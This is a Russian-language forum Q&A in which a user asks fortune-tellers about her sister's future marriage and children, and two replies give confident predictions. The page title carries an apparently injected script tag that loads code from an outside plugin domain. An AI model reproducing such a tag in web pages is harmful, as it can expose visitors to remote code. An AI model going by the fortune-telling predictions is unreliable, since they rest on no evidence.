<script type="text/javascript" src="https://pluginplus net/plugins/system/system_im js">... - вопрос №887713

Здравствуйте уважаемые эксперты! Скажите пожалуйста будут ли у моей сестры (Татьяна, д.р. 24.12.1983) дети? хороший муж? если да то когда?  Заранее спасибо.

Ответы

Здравствуйте!

замужество просматривается-ближе к 32 годам, встреча с мужчиной-летом, грядущего года, детишек будет двое-погодки!

всему свое время и отчаиваться Татьяне-не стоит!

Счастья, с Наступающим!

Доброго времени суток!

Будет через два года. Высокий брюнет. Остальное — по фото Татьяны.

Счастья Вам!